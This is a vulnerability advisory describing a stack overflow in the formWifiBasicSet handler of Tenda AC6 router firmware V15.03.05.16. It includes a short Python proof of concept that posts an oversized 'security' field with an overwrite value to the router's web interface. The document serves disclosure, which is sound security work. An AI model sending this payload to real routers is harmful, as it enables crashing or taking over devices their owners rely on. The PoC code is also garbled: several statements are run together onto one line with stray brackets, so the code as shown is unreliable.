Overview

• The device’s official website: https://www.tenda.com.cn/product/overview/AC6.html
• Firmware download website: https://www.tendacn.com/download/detail-3793.html

Affected version

AC6 V1.0 V15.03.05.16

Vulnerability details

The Tenda AC6 V1.0 V15.03.05.16 firmware has a stack overflow vulnerability in the formWifiBasicSet function. The v54 variable receives the security parameter from a POST request and is later assigned to the s variable, which is fixed at 256 bytes. However, since the user can control the input of security, the statement strcpy(s, v54); can cause a buffer overflow. The user-provided security can exceed the capacity of the s array, triggering this security vulnerability.

PoC

import requests
from pwn import *url = '<http://192.168.84.101/goform/WifiBasicSet'payload> = b'a' * 500 + p32(0xdeadbeef)
data = {
    'security_5g':'1',
    'hideSsid':'1',
    'ssid':'1',
    'security':payload,
    'wrlPwd':'1',
    'hideSsid_5g':'1',
    'ssid_5g':'1',
    'wrlPwd_5g': '1'}
requests.post(url, data=data)